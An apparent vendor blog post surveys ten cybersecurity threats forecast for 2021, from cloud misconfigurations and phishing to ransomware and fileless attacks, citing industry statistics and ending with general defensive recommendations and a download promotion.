According to a report by Cybersecurity Ventures, global cybercrime costs are expected to grow by 15 percent per year over the next five years, reaching $10.5 trillion USD annually by 2025, up from $3 trillion USD in 2015. As businesses continue to adopt more innovative technologies to streamline operations, their risk of being exposed to a cyberattack is spiraling upward as well.
Cyberattacks have grown in sophistication and volume in 2020. Some estimates have put the increase in attacks during the pandemic at 400 percent or more. Businesses around the world are facing an unprecedented level of risk. That’s why IT security continues to be the No. 1 priority for IT teams, as reported in the Kaseya 2020 IT Operations Survey Report.
Cybersecurity Threats to Be Aware of in 2021
1. Cloud-Based Threats
With more companies digitally transforming and leveraging online collaboration tools in 2020, the migration to cloud computing also accelerated. The cloud will continue to shape the way businesses operate in 2021 and beyond.
According to IDC, global cloud services market spending is projected to reach USD $1 trillion in 2024, at a compound annual growth rate (CAGR) of 15.7 percent during the forecast period of 2020 to 2024.
However, this rapid migration to the cloud exposes businesses to a slew of security challenges and threats. Cloud app vulnerabilities, incomplete data deletion, misconfigurations in cloud storage, and diminished visibility and control are some of the common cloud services issues that increase cybersecurity risks.
2. Insider Threats
According to the 2020 Verizon Data Breach Investigations Report, nearly 30 percent of security breaches involve internal actors. Insider threats include both malicious attacks as well as the negligent use of data and systems by employees. These insider threats are expected to not only continue but spike in 2021 and beyond.
To stay secured against insider threats, companies must quickly and accurately detect, investigate and respond to issues that could be indicators of potential insider attacks. Since conventional antivirus and antimalware tools are not as effective against insider threats, you need specialized tools to safeguard your business against them.
These tools detect insider threats by monitoring:
- Unauthorized logins
- New apps installed on locked-down computers
- Users that were recently granted admin rights to a device
- New devices on restricted networks, and more
These tools may combine machine learning and intelligent tagging to identify anomalous activity, suspicious changes and threats caused by system misconfigurations.
3. Remote Worker Endpoint Security
2020 saw an unprecedented increase in the number of remote workers for businesses around the globe. Many companies are planning to make remote work permanent in 2021 and beyond. This opens up opportunities for hackers.
Remote workers often operate without any network perimeter security, thus missing out on a critical part of layered cybersecurity defense. Cybercriminals have quickly adapted to the remote working environment by exploiting cloud-based services, improperly secured VPNs and unpatched remote computers to hack into off-network systems. It’s critical for IT teams to use remote monitoring and endpoint management tools that can automatically patch off-network computers to help keep them secure.
4. Phishing Attacks
Phishing scams typically employ social engineering in traditional email and cloud services attacks. Phishing can result in Business Email Compromise (BEC), Account Takeover (ATO), credential theft, ransomware and other security breaches. Emails are typically disguised as messages from trusted individuals like a manager, coworker, or business associate to trick your employees into activating the enclosed malware or granting unauthorized access.
According to the 2020 Verizon Data Breach Investigations Report, 22 percent of breaches involved phishing.
Phishing attacks will continue to be carried out through cloud applications as well as via traditional emails. Organizations should take advantage of email phishing protection software and employee training to reduce the risk associated with these attacks.
A deepfake is the use of machine learning and artificial intelligence (AI) to manipulate an existing image or video of a person to portray some activity that didn’t actually happen. There’s much speculation that deepfakes will continue to be a major cybersecurity threat in 2021 and beyond, often being used for malicious intent.
We might witness cybersecurity threats, such as deepfake usage for committing fraud through synthetic identities, and the emergence of deepfake-as-a-service organizations. 2021 might also be the year when deepfakes go on to render more convincing phishing scams than ever before, which could end up costing businesses billions of dollars.
6. IoT Devices
A Fortune Business report indicates that the Internet of Things (IoT) market is likely to grow to $1.1 trillion by 2026. Needless to say, this widespread use of IoT devices will herald a larger number of increasingly complex cybersecurity threats. There could also be a serious threat to the Internet of Medical Things (IoMT) that could develop into a grave Internet health crisis.
The fact that a majority of the new IoT devices are still in their infancy means that there’s a much larger attack surface for cybercriminals to target the vulnerabilities associated with these novel technologies. In addition, it is extremely difficult to develop cybersecurity strategies to keep up with the rapid emergence of new IoT devices.
Malvertising, a portmanteau of malicious advertising, is the use of online ads to spread malware. Generally this occurs through the injection of malicious code into ads that are then displayed on various websites through legitimate online advertising networks. Malvertising is expected to remain a critical cyberthreat in 2021.
Two of the recent trends in malvertising that may not be regarded as malware attacks include advertisements targeting mobile devices linked to “fleeceware” or fraudulent apps and technical support scams that employ “browser locking” of webpages. These novel cyberthreat trends may be classified as ‘fake alert’ attacks wherein the malvertisment is designed to frighten the target into taking an action that serves the interests of the scammer.
Technical support scams are focused on steering the targets in a way that they inadvertently provide remote access to their systems. The targets are then driven to either compromise their credit card data (which is used for fraudulent purposes) or subscribe to exorbitantly priced technical support services and software.
Scammers have also transitioned to the “pull” model wherein they employ the use of malicious web ads that convince the users that they have been locked out of their computers for security reasons and drive them to reach out to the scammers themselves.
8. Fileless Attacks and Living Off the Land
A subcategory of living off the land (LotL) attacks, fileless attacks exploit features and tools that are present in the victim’s environment. Such attacks do not depend on file-based payloads and usually do not generate new files. That said, fileless attacks are often not identified by conventional detection and prevention (antivirus) solutions.
A fileless attack usually starts with an email that links to a malicious website. By employing social engineering tactics on the malicious website, the attacker can use system tools, such as PowerShell, to retrieve and implement payloads in the system memory. Although fileless attacks have been around for decades, their significant success rate has ensured that they keep trending upwards.
Because the tools being used by the attackers are already present in the victim’s IT environment (like PowerShell), it’s hard to detect these malicious attacks. You will need to do more extensive behavioral analysis to determine that the tools are being used in a way that is abnormal.
9. Sophisticated and Targeted Ransomware Attacks
Ransomware attacks have been a major concern for businesses over the past several years. Ransomware’s success is largely owed to the relative simplicity with which an attacker can achieve devastating effects. Ransomware kits are dirt cheap and readily available on the Dark Web.
Ransomware operators have devised innovative ways to spread rapidly, dodge endpoint security protocols and launch successful attacks on targeted companies and individuals. This is a major cause for concern since the effects of a single ransomware attack can be extremely damaging to small and midsize businesses, leading to exorbitant costs associated with downtime and recovery.
Given their increasing sophistication, greater frequency and new targeted approach, it can be safely said that the cost of ransomware in 2021 will be much higher than in 2020. Cybersecurity Ventures’ report for 2020 estimates that the total cost of cybercrime damages in 2021 will exceed $6 trillion, of which the cost of damages caused by ransomware alone will be $20 billion.
Given the likelihood of falling victim to a ransomware attack, it’s critical to have a comprehensive backup strategy in place to protect your organization.
10. Social Media-Based Attacks
Social media has frequently been the medium of choice for launching various types of cyberattack. We predict attackers are likely to transition from targeting individuals to targeting businesses in 2021. For example, cybercriminals might launch an attack by announcing a new product or a webinar mimicking a legitimate business. Once the user clicks on the registration URL, they would be redirected to a malicious website and driven to compromise personally identifiable information or credentials for multifactor authentication.
Inefficient verification and authentication practices further enable social media attacks to succeed. Abbreviated URLs and malicious QR codes might be employed to obscure malicious websites and launch cyberattacks on either the legitimate business account or through rogue accounts that use the same name.
Practical Strategies to Enhance IT Security
Fortunately, with a few simple steps you can bolster your IT security and protect your business.
- Automate patch and vulnerability management to keep your systems up to date and protected against cyberattacks that exploit known software vulnerabilities.
- Back up your systems and SaaS application data to ensure efficient and quick recovery from ransomware and other attacks.
- Deploy advanced AV/AM solutions that provide endpoint detection and response (EDR) and keep your systems secure.
- Make sure that any laptop or device that leaves the office has a full suite of security services, including a local firewall, advanced malware protection, DNS filtering, disk encryption and multifactor authentication.
- Have an incident response plan. Should a security breach occur, you need a robust action plan to efficiently deal with the breach and get your company back on its feet as quickly as possible, with minimum damage. The plan should include a communications strategy for both internal and external stakeholders, including customers and investors. The more you prepare in advance, the better equipped you will be to deal with a crisis.
Download our infographic 7 Scary Cybersecurity Statistics and Recommendations to Improve Security to learn more.